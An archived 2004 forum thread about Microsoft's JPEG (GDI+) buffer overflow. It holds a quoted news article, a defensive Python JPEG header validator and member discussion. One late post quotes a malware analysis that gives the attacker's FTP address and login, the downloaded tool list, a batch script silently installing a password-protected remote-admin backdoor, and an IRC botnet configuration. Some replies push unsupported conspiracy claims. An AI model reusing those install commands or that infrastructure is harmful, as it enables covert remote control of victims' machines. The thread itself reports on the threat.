Film-Tech Cinema Systems
Film-Tech Forum ARCHIVE


Author Topic: Viruses in JPEG images
Brad Miller
Administrator

Posts: 17775
From: Plano, TX (36.2 miles NW of Rockwall)
Registered: May 99


posted 09-19-2004 12:41 AM
As if we don't have enough spamming and viruses in this world...

Microsoft warns of poisoned picture peril

quote:
Microsoft warns of poisoned picture peril

By Kevin Poulsen, SecurityFocus
Published Wednesday 15th September 2004 07:39 GMT

The old bromide that promises you can't get a computer virus by looking at an image file crumbled a bit further Tuesday when Microsoft announced a critical vulnerability in its software's handling of the ubiquitous JPEG graphics format.

The security hole is a buffer overflow that potentially allows an attacker to craft a special JPEG file that would take control of a victim's machine when the user views it through Internet Explorer, Outlook, Word, and other programs. The poisoned picture could be displayed on a website, sent in email, or circulated on a P2P network.

Windows XP, Windows Server 2003 and Office XP are vulnerable. Older versions of Windows are also at risk if the user has installed any of a dozen other Microsoft applications that use the same flawed code, the company said in its advisory. The newly-released Windows XP Service Pack 2 does not contain the hole, but vulnerable versions of Office running atop it can still be attacked if left unpatched. Patches are available from Microsoft's website.

The company said it's not aware of the hole being publicly exploited in the wild, and has not seen any examples of proof of concept code.

The JPEG bug rounds out a growing menagerie of vulnerabilities in code that displays image files. Mozilla developers last month patched the open-source browser against a critical hole discovered in a widely-deployed library for processing PNG images. And last July, Microsoft simultaneously fixed two image display holes in Internet Explorer: one made users potentially vulnerable to maliciously-crafted BMP images, the second to corrupt GIF files. The GIF bug had been publicly disclosed 11 months earlier.

There was a time when the idea of a malicious image file was absurd enough to be the topic of an April Fools joke. One early and widely-circulated hoax message dating from 1994 warned users of a computer virus infecting the comment field of JPEG files.

"It was someone saying that just looking at a JPEG on your screen can get you a virus," recalls Rob Rosenberg, editor of the debunking site Vmyths.com. "In '94 it was a myth, but in '04 it's the real thing... We've got the JPEG of death now."

Here is what Microsoft's website has to say

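The quoted article describes the hole as a buffer overflow in the code that parses JPEG files. The following is an added example, written for this page and not taken from the article or from any forum member, of the defender-side check a robust decoder applies before it trusts a file: a JPEG is a sequence of marker segments, and every segment except SOI, EOI and the restart markers carries a big-endian 16-bit length that counts its own two bytes, so a length below 2, or one that runs past the end of the file, is malformed and must be rejected before any buffer is sized from it. The function names, the marker table and the minimal SOI + COM + EOI sample files are this example's own constructions.

```python
"""Walk the marker segments of a JPEG file and reject malformed segment lengths.

Added example for this thread: a header pre-screen, not an image decoder.
"""
import struct

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Markers that carry no length field: SOI, EOI and RST0..RST7.
STANDALONE = {SOI, EOI} | set(range(0xD0, 0xD8))


def walk_segments(data: bytes):
    """Return [(marker, offset, declared_length), ...] for the header segments.

    Walks from SOI up to and including SOS (entropy-coded data follows SOS and is
    not parsed here) or EOI. Raises ValueError on any structural problem that a
    lenient decoder might otherwise gloss over.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    pos = 2
    segments = []
    while pos < len(data):
        start = pos
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        # Any number of 0xFF fill bytes may precede the marker code.
        while pos < len(data) and data[pos] == 0xFF:
            pos += 1
        if pos >= len(data):
            raise ValueError("truncated marker")
        marker = data[pos]
        pos += 1
        if marker in STANDALONE:
            segments.append((marker, start, 0))
            if marker == EOI:
                break
            continue
        if pos + 2 > len(data):
            raise ValueError(f"marker 0x{marker:02X} at {start}: truncated length field")
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        # The length field counts its own two bytes, so anything below 2 is
        # malformed; a parser that blindly computes length - 2 underflows here.
        if length < 2:
            raise ValueError(f"marker 0x{marker:02X} at {start}: length {length} < 2")
        if pos + length > len(data):
            raise ValueError(
                f"marker 0x{marker:02X} at {start}: length {length} runs past end of file"
            )
        segments.append((marker, start, length))
        if marker == SOS:
            break
        pos += length
    return segments


def is_well_formed(data: bytes):
    """Return (True, None) for a structurally sound header, else (False, reason)."""
    try:
        walk_segments(data)
        return True, None
    except ValueError as exc:
        return False, str(exc)


def build_minimal_jpeg(comment: bytes, comment_length=None) -> bytes:
    """Constructed sample: SOI, one COM segment, EOI. comment_length, if given,
    overrides the true length so malformed files can be produced for testing."""
    if comment_length is None:
        comment_length = len(comment) + 2
    return (b"\xff\xd8" + b"\xff" + bytes([COM]) + struct.pack(">H", comment_length)
            + comment + b"\xff\xd9")


# Constructed test inputs (not real files from the thread).
GOOD = build_minimal_jpeg(b"hello")
BAD_LENGTH = build_minimal_jpeg(b"hello", comment_length=1)
TRUNCATED = build_minimal_jpeg(b"hello", comment_length=500)

if __name__ == "__main__":
    for name, sample in (("GOOD", GOOD), ("BAD_LENGTH", BAD_LENGTH), ("TRUNCATED", TRUNCATED)):
        print(name, is_well_formed(sample))
```

The walker deliberately stops at SOS and never touches pixel data: its job is to answer "are the declared sizes consistent with the bytes actually present?" cheaply, which is the check a mail gateway or upload handler can run on every image before handing it to a full decoder. Real-world decoders tolerate some of what this rejects, so treat a failure as a reason to quarantine and inspect, not as proof of malice.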

Joe Redifer
You need a beating today

Posts: 12859
From: Denver, Colorado
Registered: May 99


posted 09-19-2004 12:59 AM
Microsoft should hire some full time employees that are actually smart. Why are there so many dumbasses who work for big corporations that don't make good products? Hell, I doubt they even beta test their products. But people will stupidly keep buying it, so Microsoft has NOTHING to worry about.


Bruce Hansen
Jedi Master Film Handler

Posts: 847
From: Stone Mountain, GA, USA
Registered: Dec 1999


posted 09-19-2004 02:08 PM
Microsoft products have so many patches on them, they look like quilts.


Steve Kraus
Film God

Posts: 4094
From: Chicago, IL, USA
Registered: May 2000


posted 09-19-2004 07:19 PM
Is it about time to consider criminal penalties for people who write or disseminate viruses, etc.? This is costing society billions.


Joe Redifer
You need a beating today

Posts: 12859
From: Denver, Colorado
Registered: May 99


posted 09-19-2004 07:59 PM
I think such penalties do exist. But it is extremely difficult to find the perpetrators.


Steve Kraus
Film God

Posts: 4094
From: Chicago, IL, USA
Registered: May 2000


posted 09-19-2004 08:21 PM
You don't suppose there is more than a symbiotic relationship (and by that I mean $$$) between virus makers and anti virus software vendors, do you? I mean who has the most to gain?


Bobby Henderson
"Ask me about Trajan."

Posts: 10973
From: Lawton, OK, USA
Registered: Apr 2001


posted 09-19-2004 10:48 PM
I don't think there is much desire on the part of the government to crack down on virus writers. Aside from the anti-viral software industry conspiracy, there are other reasons for the lack of a crack down.

The government is probably not making lots of busts because they might wind up arresting more than a few political friends who also happen to be white collar criminals. I know this sounds like a reach, but think about it. To find virus writers means coming up with more efficient ways to follow money trails. If they go digging too efficiently into records of lots of financial transactions, some of their good-ol-boy-network buddies are going to get caught in the net as it is pulled into the boat.

Then you have the other problem: who the viruses are hurting.

The government clearly doesn't care about end users of personal computers and the lost productivity we suffer from all the spam and viruses. Big corporations are hardly affected by this at all. Sure, you'll get a denial of service attack once in a while on a major web site. But overall major corporations suffer very little down time at all over this stuff. Their operations don't run on little off the shelf PCs. They're using UNIX mainframes and stuff like that.


Daryl C. W. O'Shea
Film God

Posts: 3977
From: Midland Ontario Canada (where Panavision & IMAX lenses come from)
Registered: Jun 2002


posted 09-20-2004 02:04 AM
There's no money trail to follow. Anti-Virus companies don't need to pay people to write virii. There are plenty of college/university losers with no girlfriends to write them free o' charge.

More on topic. There aren't, as of the present, any virii embedded in JPEG files. It's possible to exploit certain pieces of software that use a common module, but no one has done it yet. Microsoft is, yet again, being proactive on patching their products.

The problem is they can't win either way. They release a patch before there's an exploit and lazy people don't install the patch. Then somebody reverse engineers the patch (not entirely hard to do if you know what you're doing), and releases an exploit to attack those long unpatched systems. People bitch at Microsoft. They can't win.

As for tracking down the people who write virii, etc. It's far more difficult to do than tracking down spam sources, for instance.

Imagine you come across a blank piece of generic paper. Then you go to some (any) library and type out something, like a riddle, whatever. Then print that on a very common (and therefore untraceable) printer, such as any number of Hewlett Packard LaserJets. Then stick that riddle in an envelope, address, and stamp it, without leaving any personally identifying evidence. Then mail that from anywhere in the world. Yes, pretend that you can mail it anywhere in the world you want at no additional cost. Now tell me how to track you down after I receive it. It's not easy.

Sending instructions can be done anonymously so long as you don't require any response back. In some cases, you can even accept a response but drop it before it ever gets anywhere near you.


Ben Holley
Film Handler

Posts: 65
From: Texas
Registered: Feb 2004


posted 09-20-2004 11:07 AM
This may be a little off-topic, but a computer-savvy friend and I were discussing how the number of security flaws being discovered and exploited in Windows has been on the rise since the Homeland Security Act was passed. Which led to us discussing whether maybe Microsoft was leaving backdoors in its patches and updates for Big Brother. Has anyone else heard these rumors?


Jeff Stuckey
Film Handler

Posts: 62
From: Oklahoma City, OK, USA
Registered: May 2003


posted 09-20-2004 04:45 PM
I actually got this, and Cox Communications shut my service down. I called, and they said my account was suspended because I was sending out a virus. Which I thought was rather odd because I barely use my computer at home. So they turned me back on long enough to do a live update and scan the drive. It found no virus. I called them back and they still would not turn me back on. Said it was probably a trojan virus, then accused me of downloading from Kazaa, which could probably be the problem. I promptly informed them I haven't used Kazaa for a year or so now. The professional all-knowing Cox tech then told me to just format my C drive, then call them back. [Mad] I told him I was behind three firewalls (router, Zone Alarm and Windows XP). He said that wouldn't matter. And Cox has this big anti-virus free campaign BS going on too.

I went in and did a system restore backing up about 2 days, then called them back the next morning. So far no problems. Was told by Cox that this was my first "strike". Two more, and they will not turn me back on. Nice, huh.

Some people have just way too much time on their hands.


Daryl C. W. O'Shea
Film God

Posts: 3977
From: Midland Ontario Canada (where Panavision & IMAX lenses come from)
Registered: Jun 2002


posted 09-20-2004 04:48 PM
What's so wrong with Cox being responsible and protecting their and others' networks from abuse?

You did install all applicable security updates after you rolled back the system, right?


Bobby Henderson
"Ask me about Trajan."

Posts: 10973
From: Lawton, OK, USA
Registered: Apr 2001


posted 09-20-2004 06:18 PM
quote: Daryl C. W. O'Shea
There's no money trail to follow.
Sure there is. Spammers make a lot of money from this method of advertising. And some spammers have been caught over the money exchanging hands instead of computer forensics.

There is also a money trail with all the fraud from phishing and other schemes. The federal government just doesn't feel like doing much about this problem because it doesn't appear to be hurting any powerful, politically connected people bad enough. To them it is just a minor annoyance. And for some businesses out there it is a gold mine.


Daryl C. W. O'Shea
Film God

Posts: 3977
From: Midland Ontario Canada (where Panavision & IMAX lenses come from)
Registered: Jun 2002


posted 09-20-2004 06:32 PM
I thought we were talking about money trails to common virii, my bad.

quote: Bobby Henderson
To find virus writers means coming up with more efficient ways to follow money trails.


Mark Lensenmayer
Phenomenal Film Handler

Posts: 1605
From: Upper Arlington, OH
Registered: Sep 1999


posted 09-27-2004 10:06 PM
Looks like it's not theoretical any more:

JPEG Virus Found

Here are some comments:

quote:
Once this JPEG overflowed GDI+, it phoned home, connected to an ftp site and downloaded
almost 2 megs of stuff. It installs a trojan that installs itself as a service.

It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."

It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users were logged in!)

it downloads these files:

-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe

and executes 'execute.bat', which looks like:

regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server

it also installs an irc client with this config info:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d


Joe Redifer
You need a beating today

Posts: 12859
From: Denver, Colorado
Registered: May 99


posted 09-27-2004 10:48 PM
Just another hole in the screen door known as Windows.


© 1999-2020 Film-Tech Cinema Systems, LLC. All rights reserved.